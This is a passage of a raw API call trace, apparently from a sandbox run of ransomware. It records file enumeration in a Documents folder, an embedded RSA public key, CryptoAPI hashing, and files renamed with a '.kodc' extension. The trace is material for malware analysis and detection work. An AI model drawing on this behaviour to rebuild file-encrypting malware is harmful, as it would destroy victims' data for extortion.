[0098.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.328] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a9a0 [0098.328] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0098.329] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.329] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.329] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.329] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.329] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.329] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a9b8 [0098.329] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.329] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.329] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.329] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a988 [0098.329] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.329] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.329] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.329] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.329] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xd90b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.329] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.329] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.330] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.330] CloseHandle (hObject=0x5cc) returned 1 [0098.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0098.336] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iB9J6qmzlzOT0c.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ib9j6qmzlzot0c.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iB9J6qmzlzOT0c.docx.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ib9j6qmzlzot0c.docx.kodc")) returned 1 [0098.338] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f85dcf0, ftCreationTime.dwHighDateTime=0x1d5b68d, ftLastAccessTime.dwLowDateTime=0xae6f4a90, ftLastAccessTime.dwHighDateTime=0x1d5c38a, ftLastWriteTime.dwLowDateTime=0xae6f4a90, ftLastWriteTime.dwHighDateTime=0x1d5c38a, nFileSizeHigh=0x0, nFileSizeLow=0x1814a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iiPNVu.xls", cAlternateFileName="")) returned 1 [0098.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0098.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.338] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iiPNVu.xls") returned=".xls" [0098.338] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iiPNVu.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\iipnvu.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.339] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=98634) returned 1 [0098.339] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.344] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x18124, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.344] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.345] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x1814a, lpOverlapped=0x0) returned 1 [0098.345] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.346] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.346] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.346] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.346] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.346] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.347] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.347] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.347] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.347] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.347] GetLastError () returned 0x0 [0098.347] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.347] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.347] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.347] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.347] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.347] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.347] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.347] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18150) returned 0x9ba4d90 [0098.348] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d018 [0098.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a970 [0098.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d060 [0098.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a988 [0098.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a9b8 [0098.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a9d0 [0098.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.348] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0098.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a9b8 | out: hHeap=0x630000) returned 1 [0098.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a9d0 | out: hHeap=0x630000) returned 1 [0098.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0098.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a9d0 [0098.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0098.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a9b8 [0098.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0098.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0098.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0098.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a9d0 | out: hHeap=0x630000) returned 1 [0098.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a9b8 | out: hHeap=0x630000) returned 1 [0098.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.349] GetCurrentThreadId () returned 0x42c [0098.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8eb78 [0098.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.349] GetCurrentThreadId () returned 0x42c [0098.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a9b8 [0098.351] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0098.351] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a9d0 [0098.351] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a9a0 [0098.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a9e8 [0098.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a5b0 [0098.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0098.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a9b8 | out: hHeap=0x630000) returned 1 [0098.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a9b8 [0098.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.353] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0098.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.353] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0098.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.353] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0098.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0098.353] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0098.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.353] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0098.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a9b8 | out: hHeap=0x630000) returned 1 [0098.353] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0098.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.353] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0098.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0098.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0098.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0098.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a9e8 | out: hHeap=0x630000) returned 1 [0098.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a9d0 | out: hHeap=0x630000) returned 1 [0098.355] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a9a0 | out: hHeap=0x630000) returned 1 [0098.355] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0098.355] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0098.355] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0098.355] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a988 | out: hHeap=0x630000) returned 1 [0098.355] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9d060 | out: hHeap=0x630000) returned 1 [0098.355] HeapFree (in: hHeap=0x630000, 